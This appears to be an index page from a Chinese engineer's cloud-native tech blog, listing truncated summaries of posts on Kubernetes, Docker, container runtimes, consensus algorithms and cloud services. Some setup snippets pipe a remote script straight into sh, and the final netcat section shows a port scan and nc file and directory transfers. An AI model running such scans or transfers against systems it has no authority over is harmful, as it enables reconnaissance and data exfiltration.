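Kubernetes arbitrary file access vulnerability

Kubernetes recently published a series of security updates that fix an arbitrary file access vulnerability caused by improper subpath handling (CVE-2017-1002101 and CVE-2017-1002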

Azure Container Instance (ACI)

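Azure Container Instances (ACI) offers the simplest and fastest way to run containers in Azure, without requiring users to provision any virtual machines or other higher-level services. ACI suits workloads with rapid bursts of growth and resource adjustments,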

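Introduction to Azure Container Service (ACS)

Azure Container Service (ACS) is the container service that Microsoft Azure launched in 2015. It supports several container orchestrators, including Kubernetes, DC/OS, and Docker Swarm. The core functionality of ACS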

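Introduction to Azure Managed Kubernetes (AKS)

Azure Container Service (AKS) is a managed Kubernetes service (in preview) that Microsoft Azure released recently. It is independent of the existing Azure Container Service (ACS). With AKS, users need no container orchestration expertise to quickly and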

Docker MTA Program

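With the wave of containerization and cloud native, many companies have already started to containerize. However, converting existing applications to containers and a cloud-native architecture is not easy, and maintaining these legacy applications can cost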

Docker CE/EE natively supports Kubernetes

At this year's DockerCon EU (2017), Solomon, Brendan, Hockin, and others jointly announced that Docker will natively support Kubernetes, which means that Kubernet

Re-enabling HTTPS

GitHub Pages automatically enabled HTTPS for sites without a custom domain (of the form <username>.github.io), but has never supported configuring custom

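TensorFlow in practice

TensorFlow is a machine learning framework that Google open-sourced in November 2015. It derives from DistBelief, Google's internal deep learning framework. Thanks to its sound architecture,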

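Starting an open-source e-book: Kubernetes指南 (Kubernetes Guide)

Kubernetes is a container cluster management system open-sourced by Google. It is the open-source version of Borg, Google's long-standing large-scale container management technology, and one of the most important components of the CNCF. It mainly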

Debugging application in containers

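For ordinary server processes, we can easily debug with the various tools available on the host. Containers, however, often contain only the necessary application and generally lack the usual debugging tools, so how do we debug online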

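Creating a swarm cluster with docker dind

On OS X, Docker for Mac can create only one virtual machine, so building a multi-node swarm cluster requires starting additional virtual machines and manually installing and configuring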

Grumpy: running Python programs with Go

Grumpy is a tool recently open-sourced by Google (https://github.com/google/grumpy) that compiles Python programs into Go programs

bcc

BPF Compiler Collection (BCC) - Tools for BPF-based Linux IO analysis, networking, monitoring

Website: https://github.com/iovisor/bcc

Basic usage of bcc (tutorial)

Install bcc:

    echo -e '[iovisor]\nbaseurl=https://repo.iovisor.org/yum/nightly/f23/$basearch\nenabled=1\ngpgcheck=0' | sudo tee /etc/yum.repos.d/iovisor.repo
    yum install bcc-tools

Now bcc is installed at /usr/share/bcc/tools.

    # ls /usr/share/bcc/tools
    argdist       cachestat   ext4dist        hardirqs        offwaketime  softirqs    tcpconnect  vfscount
    bashreadline  cachetop    ext4slower      killsnoop       old          solisten    tcpconnlat  vfsstat
    biolatency    capable     filelife        llcstat         oomkill      sslsniff    tcplife     wakeuptime
    biosnoop      cpudist     fileslower      mdflush         opensnoop    stackcount  tcpretrans  xfsdist
    biotop        dcsnoop     filetop         memleak         pidpersec    stacksnoop  tcptop      xfsslower
    bitesize      dcstat      funccount       mountsnoop      profile      statsnoop   tplist      zfsdist
    btrfsdist     doc         funclatency     mysqld_qslower  runqlat      syncsnoop   trace       zfsslower
    btrfsslower   execsnoop   gethostlatency  offcputime      slabratetop  tcpaccept   ttysnoop

capable

Kubernetes v1.5.0 release

Update on 2016.12.14: Due to a serious security problem, Kubernetes v1.5.0 is not recommended. Kubernetes v1.5.1 has just been released, so we should upgrade to v1.5.1 directly. The --anonymous-auth= flag in v1.5.0 is true by default (which may allow any user to access the Kubernetes API), but v1.5.1 changes the default to false.

Kubernetes v1.5.0

StatefulSets (ex-PetSets)
    StatefulSets are beta now (fixes and stabilization)
Improved Federation Support
    New command: kubefed
    DaemonSets
    Deployments
    ConfigMaps
Simplified Cluster Deployment
    Improvements to kubeadm
    HA Setup for Master
Node Robustness and Extensibility
    Windows Server Container support
    CRI for pluggable container runtimes
    kubelet API supports authentication and authorization

Features

Features for this release were tracked via the use of the kubernetes/features issues repo.

Weekly reading list

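Docker acquires Infinit (PDF). Infinit provides distributed storage for containers. Its features include: Software-based: it can be deployed on any hardware, from legacy appliances to commodity bare-metal machines,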

Weekly reading list

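A distributed backend "millisecond" service engine. On December 4, Tencent's QQ team open-sourced a service development and operations framework called 毫秒服务引擎 (Mass Service Engine in Cluster, MSEC). It integrates R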

Notes from KubeCon/CloudNativeCon 2016

Preface: Last week I went to Seattle for KubeCon & CloudNativeCon 2016, where I not only met Dawn, Brendan, Tim, and the Sig No

sysdig

Tips for sysdig. Sysdig captures system calls and other system-level events using a Linux kernel facility called tracepoints, providing a rich set of real-time, system-level information. Sysdig “packetizes” this information, so that you can do things like save it into trace files and easily filter it, a bit like you would do with tcpdump. This makes it very flexible to explore what processes are doing. Sysdig instruments your physical and virtual machines at the OS level by installing into the Linux kernel and capturing system calls and other OS events.

Kubernetes Development

Tips for Kubernetes development

Set up the development virtual machine:

    apt-get install -y gcc make socat git

    # install docker
    curl -fsSL https://get.docker.com/ | sh

    # install etcd
    curl -L https://github.com/coreos/etcd/releases/download/v3.0.10/etcd-v3.0.10-linux-amd64.tar.gz -o etcd-v3.0.10-linux-amd64.tar.gz && tar xzvf etcd-v3.0.10-linux-amd64.tar.gz && /bin/cp -f etcd-v3.0.10-linux-amd64/{etcd,etcdctl} /usr/bin && rm -rf etcd-v3.0.10-linux-amd64*

    # install golang
    curl -sL https://storage.googleapis.com/golang/go1.8.linux-amd64.tar.gz | tar -C /usr/local -zxf -
    export GOPATH=/gopath
    export PATH=$PATH:$GOPATH/bin:/usr/local/bin:/usr/local/go/bin/

    # Get kubernetes code
    mkdir -p $GOPATH/src/k8s.io
    git clone https://github.

Paxos

Paxos is a message-passing consensus algorithm with a high degree of fault tolerance, proposed by Leslie Lamport in 1990. Papers: The Part-Time Parliament; Paxos Made Simple; Paxos Made Live; Consensus: Bridging Theory and Practice; Paxos

Zab

Zab (ZooKeeper Atomic Broadcast protocol) is the consensus protocol used inside ZooKeeper. Compared with Paxos, Zab's most distinctive feature is that it guarantees strong consistency (strong consi

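Consistency in distributed systems

Consider the tension between consistency and performance when data is replicated: 1) To make data highly available, you have to write multiple copies. 2) Writing multiple copies leads to data consistency problems. 3) Data consistency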

SR-IOV

SR-IOV (Single Root I/O Virtualization) is a standard for sharing a PCIe device among virtual machines. By giving each virtual machine its own memory space, interrupts, and DM

PV Calls

PV Calls is a paravirtualized protocol that allows the implementation of a set of POSIX functions in a different domain. The PV Calls frontend sends POSIX function calls to the backend, which implements them and returns a value to the frontend. This version of the document covers networking function calls, such as connect, accept, bind, release, listen, poll, recvmsg and sendmsg; but the protocol is meant to be easily extended

Virtio vsock

virtio-vsock is a host/guest communications device. It allows applications in the guest and host to communicate. This can be used to implement hypervisor services and guest agents (like qemu-guest-agent or SPICE vdagent). Unlike virtio-serial, virtio-vsock supports the POSIX Sockets API so existing networking applications require minimal modification. The Sockets API allows N:1 connections so multiple clients can connect to a server simultaneously. The device has an address assigned automatically so

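Cloud Native

Cloud Native is structuring teams, culture and technology to utilize automation and architectures to manage complexity and unlock velocity. A cloud-native application is one designed and developed from the start to be deployed and run on a cloud platform. To be fair, most traditional applications, without any changes, can all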

SwarmKit

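SwarmKit is the cluster management system released with Docker 1.12 and built into the Docker daemon. It mainly provides the following features: container scheduling, health checks, and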

Kubernetes container runtime interface

Preface: Recently I have been refactoring the Kubernetes Container Runtime Interface (CRI) and adding plugin-style support for bringing in external container

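Go tips

Go tips. Common tools: go fmt, golint, go vet, goimports, https://goreportcard.com/. Idioms: write comments as complete sentences that begin with the method or package name; keep each line within 80 bytes; start error strings with a lowercase letter; for multiple return values of the same type, add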

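Service discovery and load balancing in Kubernetes

From the outset, Kubernetes was designed with service discovery and load balancing for containers in mind. It provides the Service resource and, through kube-proxy together with clou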

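How to quickly start a Kubernetes cluster

Whereas Docker solves everything with a single binary, Kubernetes ships separate binaries for its different services and places some services in addons. As a result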

Setup hyperd with flannel network

Flannel Flannel is a virtual network that gives a subnet to each host for use with container runtimes. Platforms like Google’s Kubernetes assume that each container (pod) has a unique, routable IP inside the cluster. The advantage of this model is that it reduces the complexity of doing port mapping. flannel runs an agent, flanneld, on each host and is responsible for allocating a subnet lease out of a preconfigured address space.
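
The subnet-per-host idea described above can be illustrated with a small sketch. This is not flanneld's actual allocation logic; the address space 10.1.0.0/16, the /24 lease size, and the host names are assumptions chosen only for illustration.

```python
import ipaddress


def allocate_leases(network, hosts, prefixlen=24):
    """Hand each host its own subnet carved out of one address space.

    Hypothetical helper: a real agent would also persist and renew leases.
    """
    pool = ipaddress.ip_network(network).subnets(new_prefix=prefixlen)
    return {host: next(pool) for host in hosts}


# Assumed values: a /16 cluster network split into one /24 per host.
leases = allocate_leases("10.1.0.0/16", ["node-a", "node-b", "node-c"])
for host, subnet in leases.items():
    print(host, subnet)
```

Because every host owns a distinct subnet, each pod can have a unique, routable IP without any port mapping.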

Play with docker v1.12

Docker v1.12 brings integrated orchestration into Docker Engine. Starting with Docker 1.12, we have added features to the core Docker Engine to make multi-host and multi-container orchestration easy. We’ve added new API objects, like Service and Node, that will let you use the Docker API to deploy and manage apps on a group of Docker Engines called a swarm. With Docker 1.12, the best way to orchestrate Docker is Docker!

Playing docker with hypervisor container runtime runV

The latest master branch of runV already supports running as a runtime in Docker. Since v1.11, Docker has integrated an OCI container runtime (runc) via containerd. Since runc and runV are both recommended implementations of OCI, it is natural to make runV work with containerd. Now let’s have a try. Install runV and Docker: Docker can be installed via https://docs.docker.com/engine/installation/. Since only master branch of runV

Kubernetes-mesos architecture

From http://cdn.yongbok.net/ruo91/architecture/k8s/kubernetes_mesos_architecture_v1.x.png

Hypernetes: Bringing Security and Multi-tenancy to Kubernetes

Notes: this post is copied from http://blog.kubernetes.io/2016/05/hypernetes-security-and-multi-tenancy-in-kubernetes.html. Today’s guest post is written by Harry Zhang and Pengfei Ni, engineers at HyperHQ, describing a new hypervisor based container called HyperContainer While many developers and security professionals are comfortable with Linux containers as an effective boundary, many users need a stronger degree of isolation, particularly for those running in a multi-tenant environment. Sadly, today, those users are forced to run their containers inside virtual machines, even one VM per container.

How Docker 1.11 shares a network across containers

Docker 1.11 has moved to runc with containerd, and I am interested in how it handles a shared netns across containers. For example, I already have a running container 75599a6f387b7842c6da57efd38f9742b2ca621782f891402f83852c66dbd706. A new container in the same netns can be created with:

    docker run -itd --net=container:75599a6f387b alpine sh

This generates a runc config.json as follows:

{ "ociVersion": "0.6.0-dev", "platform": { "os": "linux", "arch": "amd64" }, "process": { "terminal": true, "user": { "additionalGids": [ 0, 1, 2, 3, 4, 6, 10, 11, 20, 26, 27 ] }, "args": [ "sh" ], "env": [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "HOSTNAME=75599a6f387b", "TERM=xterm" ], "cwd": "/", "capabilities": [ "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE" ] }, "root": { "path": "/var/lib/docker/devicemapper/mnt/d33c7932917e64bde482b437fc3ccaad9a00a04e0cf49e39f9d3be5d71991db6/rootfs", "readonly": false }, "hostname": "75599a6f387b", "mounts": [ { "destination": "/proc", "type": "proc", "source": "proc", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/dev", "type": "tmpfs", "source": "tmpfs", "options": [ "nosuid", "strictatime", "mode=755" ] }, { "destination": "/dev/pts", "type": "devpts", "source": "devpts", "options": [ "nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5" ] }, { "destination": "/sys", "type": "sysfs", "source": "sysfs", "options": [ "nosuid", "noexec", "nodev", "ro" ] }, { "destination": "/sys/fs/cgroup", "type": "cgroup", "source": "cgroup", "options": [ "ro", "nosuid", "noexec", "nodev" ] }, { "destination": "/dev/mqueue", "type": "mqueue", "source": "mqueue", "options": [ "nosuid", "noexec", "nodev" ] }, { "destination": "/etc/resolv.
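
The excerpt is cut off before the namespace section of config.json. In the OCI runtime spec, a container joins an existing namespace when an entry under linux.namespaces carries a path. The sketch below shows one way to spot such entries. The SAMPLE document, the PID 1234, and the helper name joined_namespaces are hypothetical and are not taken from the config above.

```python
import json

# Hypothetical fragment of an OCI config.json; the PID in the path is made up.
SAMPLE = """
{
  "linux": {
    "namespaces": [
      {"type": "pid"},
      {"type": "network", "path": "/proc/1234/ns/net"},
      {"type": "ipc"}
    ]
  }
}
"""


def joined_namespaces(config):
    """Return {namespace type: path} for namespaces joined from another process.

    Entries without a path are created fresh for the new container.
    """
    namespaces = config.get("linux", {}).get("namespaces", [])
    return {ns["type"]: ns["path"] for ns in namespaces if ns.get("path")}


print(joined_namespaces(json.loads(SAMPLE)))
```

Running it against a real config.json (for example one loaded with json.load) lists which namespaces the container shares with an already running process.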

Go performance optimization

Go performance optimization tips (by 雨痕). As an immutable type, a string pays a “heavy” price when it is converted to or from a byte slice ([]byte),

The Rise of Cloud Computing Systems - Jeff Dean

{% pdf http://feiskyer.github.io/assets/ccs.pdf %}

Reading notes of week 17

SIG-Networking: Kubernetes Network Policy APIs Coming in 1.3 One problem many users have is that the open access network policy of Kubernetes is not suitable for applications that need more precise control over the traffic that accesses a pod or service. Today, this could be a multi-tier application where traffic is only allowed from a tier’s neighbor. But as new Cloud Native applications are built

runc and runV

runc is a CLI tool for spawning and running containers according to the OCI specification, while runV is a hypervisor-based runtime for OCI. Both are recommended implementations (https://github.com/opencontainers/runtime-spec/blob/master/implementations.md) of OCI.

Playing with runc

Install runc:

    yum install -y libseccomp-devel
    mkdir -p $GOPATH/src/github.com/opencontainers
    cd $GOPATH/src/github.com/opencontainers
    git clone https://github.com/opencontainers/runc
    cd runc
    make
    sudo make install

Run busybox:

    $ docker pull busybox
    $ mkdir rootfs
    $ docker export $(docker create busybox) | tar -C rootfs -xvf -
    $ runc spec .

Container runtime in Docker v1.11

Docker v1.11 officially integrates runc (finally supporting OCI) and splits the former single binary into several, while keeping the docker CLI and API unchanged: docker, docker-containerd, docker-containerd-shim, docker-runc, docker-containerd-ctr

DPDK Introduction

Intel DPDK, short for Intel Data Plane Development Kit, is a set of data plane development tools provided by Intel. On the Intel architecture (IA) processor architecture, it gives user

Tips for cgo

Some cgo tips. Basic types: The standard C numeric types are available under the names C.char, C.schar (signed char), C.uchar (unsigned char), C.short, C.ushort (unsigned short), C.int, C.uint (unsigned int), C.long, C.ulong (unsigned long), C.longlong (long long), C.ulonglong (unsigned long long), C.float, C.double, C.complexfloat (complex float), and C.complexdouble (complex double). The C type void* is represented by Go’s unsafe.Pointer. The C

cgo in go 1.6

The major change is the definition of rules for sharing Go pointers with C code, to ensure that such C code can coexist with Go’s garbage collector. Briefly, Go and C may share memory allocated by Go when a pointer to that memory is passed to C as part of a cgo call, provided that the memory itself contains no pointers to Go-allocated memory, and provided that C does not retain the pointer after the call returns.

Borg, Omega, and Kubernetes (ACM Queue)

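In “Borg, Omega, and Kubernetes - Lessons learned from three container-management systems over a decade”, Brendan Burns, Brian Grant, and others share the lessons Google has learned in container management. Over its history, Google has developed three container management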

Docker overlay network dive

Don Mills's “Docker Multi-Host Networking: Overlays to the Rescue” gives a detailed analysis of Docker's overlay network and is worth a read.

Kubernetes sig-node (Asia) meeting notes

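Kubernetes 1.2 Status Update (@dchen): the Deployment object and HPA scale still have some P0 and P1 issues to resolve; AWS still has quite a few issues (probably more than 20); v1.2 as a whole still has more than 100 open issues, but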

10 things to avoid in docker containers

Red Hat's “10 things to avoid in docker containers” is very useful for building container-based services. Excerpts follow: 1) Don’t store data in containers – A container can be

Carina by Rackspace

What is Carina? Carina is a container runtime environment (currently in Beta) that offers performance, container-native tools, and portability without sacrificing ease of use. You can get started in minutes by using open-source software on managed infrastructure to run your containerized applications. Your containers run in a bare-metal environment, which avoids the “hypervisor tax” on performance. Applications in this environment launch as much as 20 percent faster and run as much as 60 percent faster.

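Introduction to Hypernetes - feisky

[Abstract] It has been a long time since I updated this blog. Today I would like to introduce the work we have been doing recently on Hypernetes, which I also shared earlier in a WeChat group. Hypernetes is a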

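Kubernetes multi-node deployment explained - feisky

[Abstract] Note: all of the following steps are based on CentOS 7. Installing ansible: ansible can be installed via yum or pip. Because kubernetes-ans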

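Docker storage structure explained - feisky

[Abstract] Because aufs has not been merged into the kernel, currently only Ubuntu can use aufs as Docker's storage driver, while other systems use lvm thin prov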

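Overview of Docker's underlying technologies - feisky

[Abstract] Docker addresses two problems: cloud computing environments are hard to distribute and complex to manage, while virtualization such as KVM and Xen wastes system resources. Docker was initially built on lxc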

Summary of OpenStack deployment tools - feisky

[Abstract] The deployment tools that currently feel fairly simple and intuitive include RDO, devstack, and Fuel: 1. RDO https://openstack.redhat.c

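Resizing Docker containers with Device Mapper - feisky

[Abstract] Author: Jérôme Petazzoni (Docker evangelist). Translator: Mark Shao (senior engineer, EMC China). If you are on CentOS, RHEL, Fedora, or another Linux that has no AUFS support by default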

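The qdisc of virtual network devices, as seen through veth - feisky

[Abstract] Background: A while ago, while testing Docker's network performance, I found a performance problem with veth and later submitted a PR to Docker upstream; see set tx_queuelen to 0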

Introduction to the Kubernetes system architecture - feisky

[Abstract] 1. Preface: Together we will ensure that Kubernetes is a strong and open container management framework for any application and in any environment, whether i…

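Summary of Docker network configuration methods - feisky

[Abstract] When Docker starts, it creates a virtual network interface named docker0 on the host. By default it picks 172.17.42.1/16, a 16-bit subnet mask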
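
As a small worked example of what the default docker0 address 172.17.42.1/16 implies, the sketch below uses Python's ipaddress module to derive the bridge network, the netmask, and the number of usable container addresses. The helper name describe_bridge is an assumption made for illustration.

```python
import ipaddress


def describe_bridge(cidr):
    """Break an interface address such as 172.17.42.1/16 into its parts."""
    iface = ipaddress.ip_interface(cidr)
    return {
        "address": str(iface.ip),            # address of the bridge itself
        "network": str(iface.network),       # subnet containers draw from
        "netmask": str(iface.netmask),
        # exclude the network and broadcast addresses
        "usable_hosts": iface.network.num_addresses - 2,
    }


info = describe_bridge("172.17.42.1/16")
for key, value in info.items():
    print(key, value)
```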

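How to use the cluster tool ansible - feisky

[Abstract] Introduction to ansible: ansible is a cluster management tool similar to puppet and saltstack. Its advantage is that it needs only ssh and Python to work,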

About

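Hi, I am Pengfei Ni (倪朋飞). I work in cloud computing and am a Kubernetes maintainer, with years of hands-on experience in cloud computing, SDN networking, and container orchestration and scheduling. Social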

Software Engineering at Google

Posted 2017-02-13 19:36:09. Tags: Google. In “Software Engineering at Google”, Google's Fergus Henderson describes Google's software engineering practices.

AWS S3 outage review and summary

Posted 2017-03-03 22:27:50. Tags: aws. S3 outage review: On February 28, while investigating an S3 billing issue in the Northern Virginia (US-EAST-1) Region, an AWS engineer mistyped

GitLab outage review and summary

Posted 2017-03-03 22:27:37. GitLab outage review: On January 31, while fixing a PostgreSQL data synchronization problem (DB Replication lagged too

Kubernetes HA

Posted 2017-03-15 18:12:47. Tags: kubernetes. Starting with Kubernetes 1.5, clusters deployed with kops or kube-up.sh automatically get a highly available system, including etcd

LinuxKit

Posted 2017-04-19 11:09:53. Tags: docker. LinuxKit is a toolkit newly released by Docker for building secure, lean, and portable operating systems for containers. Based on the yaml written by the user (specifying

Alpine Linux

Posted 2016-03-26 14:27. As more and more official images use Alpine Linux, it is worth understanding what exactly Alpine Linux is. Alpine Linux is a

Docker Datacenter

Posted 2016-02-26 17:38. Category: docker. Tags: docker, cluster. Docker announced Docker Datacenter (DDC) on February 23. It is an integrated, end-to-end platform for agile application development and management from the datacenter to the cloud. With Docker Datacenter, organizations are empowered to deploy Containers as a Service (CaaS) on-premises or in their virtual private cloud. A CaaS provides an IT-managed and secured application environment of content and infrastructure where developers can build and deploy applications in a self-service manner.

Google’s Transition From Single Datacenter, To Failover, To A Native Multihomed Architecture

Posted 2016-02-24 10:33. Category: cluster. Tags: highscalability, google. The main idea of the paper is that the typical failover architecture used when moving from a single datacenter to multiple datacenters doesn’t work well in practice. What does work, where work means using fewer resources while providing high availability and consistency, is a natively multihomed architecture:

Hello world to Docker Mac

Posted 2016-04-15 16:34. Docker for Mac is finally here. As expected, the experience is really great: installation is simpler, as a standard Mac application; VPN works without trouble; native (osxfs)

Kubernetes drain

Posted 2016-02-17 18:57. Before Kubernetes v1.2, if you wanted to perform maintenance on a node (that is, the machine where Kubelet and Docker run), such as upgrading Docker or the kernel

Kubernetes network policy

Posted 2016-02-17 18:53. The Kubernetes community (more precisely, the Kubernetes Network SIG [1]) is discussing the Network Policy Proposal, in order to implement

Notes about serverless

Posted 2016-02-26 13:36. Category: cluster. “Focus only on data and business logic, with no servers to maintain and no need to worry about system capacity or scaling”: serverless frees everyone from the server

Upgrade CentOS kernel

Posted 2016-03-30 22:25. Tags: linux. I finally could not resist upgrading the kernel. ELRepo currently provides two versions, kernel-lt (4.4) and kernel-ml (4.5): The kernel-ml packages are built from the sources available from the “mainline

2PC/3PC

API Design

Google API Design Guide, OpenAPI, Swagger, KONG, Tyk

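AWS S3 outage review and summary

S3 outage review: On February 28, while investigating an S3 billing issue in the Northern Virginia (US-EAST-1) Region, an AWS engineer mistyped a parameter of a playbook and mistakenly removed a large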

Amazon Aurora

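Amazon Aurora is a MySQL-compatible relational database engine that combines the speed and availability of high-end commercial databases with the simplicity and cost-effectiveness of open-source databases. Amazon Aurora delivers up to five times the performance of MySQL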

Amazon DynamoDB

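Amazon DynamoDB is a fast and flexible NoSQL database service for all applications that need consistent latency under 10 milliseconds at any scale. It is a fully managed cloud database that supports both document and key-value store models. Its flexible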

Amazon Leadership Principles

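Customer Obsession: Leaders start with the customer and work backwards. They work vigorously to earn and keep customer trust. Although leaders pay attention to competitors, they obsess over customers. Ownership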

Amazon RDS

Amazon Relational Database Service (Amazon RDS) is the earliest cloud database product. It offers managed relational databases, including Amazon Aurora, PostgreSQL, MySQL, MariaDB, Or

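What is the difference between Apache Mesos and Google's Kubernetes

Kubernetes is an open-source project that brings Google's cluster management tooling to virtual machines and bare metal. It runs perfectly well on modern operating system environments (such as CoreOS and R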

AppArmor

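AppArmor (Application Armor) is a Linux kernel security module that lets system administrators associate each program with a security profile, thereby restricting what the program can do. With it you can specify which files a program may read, write, or run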

CAP

Ceph

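Ceph is an open-source distributed storage system that provides object storage, block storage, and file system storage. Its main features include: High scalability: it uses commodity x86 servers and supports 10~100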

CockroachDB

CockroachDB is a scalable, geo-replicated, ACID-compliant database built on the Google Spanner paper. Design Documents

Consul

Containerd

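containerd is the component that was split out of Docker for OCI compatibility and is dedicated to image management and container execution. Upward, it exposes a gRPC interface to Docker; downward, it relies on contai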

Cosmos

Deploy a Mesos Cluster Using Docker

This tutorial will show you how to bring up a single-node Mesos cluster, all provisioned using Docker containers (a future post will show how to easily scale this out to multiple nodes, or see the update at the bottom). This means that you can start up an entire cluster with 7 commands! There is nothing to install other than a working Docker server. This will start up 4 containers:

Dive into Linux capabilities

Introduction: Capabilities in Linux are flags that tell the kernel what the application is allowed to do. If you have no additional security mechanism in place, the Linux root user has all capabilities assigned to it. As capabilities are a way of running processes with some privileges without having to grant them root privileges, it is important to understand that they exist. Consider the ping utility. It is
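
Since capabilities are per-process flags, the kernel reports them as a hexadecimal bitmask (for example the CapEff field in /proc/<pid>/status). The sketch below decodes such a mask. The table lists only a handful of capability numbers from linux/capability.h, and the helper name decode_caps is an assumption for illustration, not an existing tool.

```python
# Partial table of capability bit numbers (from linux/capability.h).
CAP_NAMES = {
    0: "CAP_CHOWN",
    1: "CAP_DAC_OVERRIDE",
    5: "CAP_KILL",
    6: "CAP_SETGID",
    7: "CAP_SETUID",
    10: "CAP_NET_BIND_SERVICE",
    12: "CAP_NET_ADMIN",
    13: "CAP_NET_RAW",
    21: "CAP_SYS_ADMIN",
}


def decode_caps(hex_mask):
    """Turn a hex capability mask into a list of capability names.

    Bits missing from the partial table are reported as cap_<number>.
    """
    mask = int(hex_mask, 16)
    return [
        CAP_NAMES.get(bit, f"cap_{bit}")
        for bit in range(mask.bit_length())
        if (mask >> bit) & 1
    ]


# Bits 12 and 13 set: network administration plus raw sockets.
print(decode_caps("0000000000003000"))
```

A tool such as ping, which opens raw sockets, needs only CAP_NET_RAW (bit 13) rather than full root privileges.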

Docker

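Introduction: Docker is an open-source engine that dotCloud announced just a few months ago. It aims to provide an automated deployment solution for applications. Put simply, it quickly creates a container (similar to a virtual machine) on a Linux system and, in the container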

Docker acquires SDN startup SocketPlane

At Socketplane we started out as four guys with a collectively strong belief in open source and open communities.  We aligned around a shared vision that we wanted to be a critical part of Docker’s once in a decade disruption. Now that we are part of the Docker team, we couldn’t be happier. We never looked to hedge our bets, our success was and obviously still is tied to the success of Docker.

Docker storage

Storage driver   Commonly used on   Disabled on
overlay          ext4, xfs          btrfs, aufs, overlay, overlay2, zfs, eCryptfs
overlay2         ext4, xfs          btrfs, aufs, overlay, overlay2, zfs, eCryptfs
aufs             ext4, xfs          btrfs, aufs, eCryptfs
btrfs            btrfs only         N/A
devicemapper     direct-lvm         N/A
vfs              debugging only     N/A
zfs              zfs only           N/A

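Docker notes

1. Introduction to Docker. Docker has two main components: Docker, an open-source container virtualization platform; and Docker Hub, a Docker SaaS platform for sharing and managing Docker containers. Docker uses a client-server (C/S) architecture. Docke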

Drawbridge

{% pdf http://feisky.xyz/container/drawbridge.pdf %}

Etcd

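Etcd is a distributed key-value store developed by CoreOS on top of Raft. It can be used for service discovery, shared configuration, and consistency guarantees (such as database leader election and distributed locks). E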

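GitLab outage review and summary

GitLab outage review: On January 31, while fixing a PostgreSQL data synchronization problem (DB Replication lagged too far behind), GitLab mistakenly deleted the production data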

Going Native with OpenStack Centric Applications: Murano

Following on our previous discussion surveying the projects supporting applications within OpenStack, let’s continue our review with an in-depth look at the OpenStack-native Application Catalog: Murano, currently an incubation status project, having seen its functionality and core services integration advanced over the past few OpenStack releases. What is it? An application catalog developed by Mirantis, HP and others (now including Cisco), that allows application developers and

Going Native with OpenStack Centric Applications: Overview

Cloud infrastructure is useless without applications running atop, providing business services and solving customer needs. So, as applications ascend to the throne as the rightful king of cloud, focus sharpens on their support within OpenStack-based clouds. With this focus, let’s walk through a survey of components and projects supporting applications in OpenStack, understanding what a day in the life of an application in OpenStack is like. We’ll start with an overview of the application ecosystem comprised of a number of supporting projects.

Google BigTable

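Google, something like the ancestor of big data, has missed wave after wave in the cloud. It missed the virtualization wave and let VMware and Docker get there first (Google started on its container approach ten years ago; bear in mind that containers rely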

Google Cloud Datastore

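In 2011, Google published the Megastore paper, which for the first time described a distributed storage system that combines high availability across data centers, horizontal scalability, and ACID transaction semantics. Google Megastore is built on top of BigTable,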

Google F1

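At the same time as the Spanner project began, Google started another project to go with Spanner: F1, a distributed SQL engine. With a strongly consistent, high-performance Spanner underneath, one can then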

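Google's production environment

Hardware: roughly 10 physical machines make up a rack, several racks make up a row, multiple rows make up a cluster, and multiple clusters make up a data center (Dat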

Hello World

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick Start Create a new post $ hexo new "My New Post" More info: Writing Run server $ hexo server More info: Server Generate static files $ hexo generate More info: Generating

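How to enable an OpenStack all-in-one VM to access the external network

First, add a public network to OpenStack. Suppose the public network segment created for the all-in-one environment is 10.10.10.0/24 and the public gateway is 10.10.1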

How to disable ubuntu services

To toggle a service from starting or stopping permanently you would need to: echo manual | sudo tee /etc/init/SERVICE.override where the stanza manual will stop Upstart from automatically loading the service on next boot. Any service with the .override ending will take precedence over the original service file. You will only be able to start the service manually afterwards. If you do not want this then simply delete the .

How to use docker compose to deploy a flask app

The flask app is very simple: you have an index page where you can write and read comments.

To start

So what do we need? In my case, a Digital Ocean droplet (I’m using Fedora 21). So, first of all, we connect to our vm with ssh.

    $ ssh [email protected]

Now that we are inside, we need to install git, Docker and docker-compose.

    $ yum -y install git docker python-pip
    $ pip install docker-compose==1.

Hypernetes The multi tenant Kubernetes distribution

“The CaaS Revolution”. This is what we believe is happening today in the Cloud ecosystem. This revolution has been started by the now famous project (and company) Docker, and embraced by Cloud providers like Google and AWS. However, most multi-tenant CaaS solutions today run on a public IaaS, and use fully isolated virtual machine clusters to schedule containers. This is in contrast to the solely container-based implementation provided in private CaaS deployments.

Hypernetes WeChat share

Today I would like to introduce the work we have been doing recently on Hypernetes. Hypernetes is a truly multi-tenant Kubernetes distro. Hyperne

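Installing Realtek rtlwifi driver for Ubuntu 14.10

Installation: The default kernel of Ubuntu 14 does not ship a driver for the RTL8192ee NIC, so the machine cannot connect over wireless, and Realtek's official website does not provide a suitable driver either. And the latest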

Installing nova docker on OpenStack Juno

This post comes about indirectly by a request on IRC in #rdo for help getting nova-docker installed on Fedora 21. I ran through the process from start to finish and decided to write everything down for posterity. Getting started I started with the Fedora 21 Cloud Image, because I’m installing onto OpenStack and the cloud images include some features that are useful in this environment. We’ll be using OpenStack packages from the RDO Juno repository.

Integrating Openstack and Kubernetes with Murano

There’s a perceived competition between OpenStack and containers such as Docker, but in reality, the two technologies are a powerful combination. They both solve similar problems, but on different layers of the stack, so combining the two can give users more scalability and automation than ever before. That containers app you wrote needs to run somewhere. This is particularly true for orchestrated container applications, such as those managed by Kubernetes.

Kafka

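Kafka is a distributed messaging system developed by LinkedIn, widely used for its horizontal scalability and high throughput. Its features include: fast persistence, with constant-time access performance; high throughput, with a single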

Linux kernel network call flow

Refer to http://blog.csdn.net/night_elf_1020/article/details/19935813

Linux netcat examples

Port scanning:
    nc -z -v -n 172.31.100.7 21-25
Chat server:
    Server: nc -l 1567
    Client: nc 172.31.100.7 1567
File transfer, server to client:
    Server: nc -l 1567 < file.txt
    Client: nc -n 172.31.100.7 1567 > file.txt
File transfer, client to server:
    Server: nc -l 1567 > file.txt
    Client: nc 172.31.100.23 1567 < file.txt
Directory transfer:
    Server: tar -cvf - dir_name | nc -l 1567
    Client: nc
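
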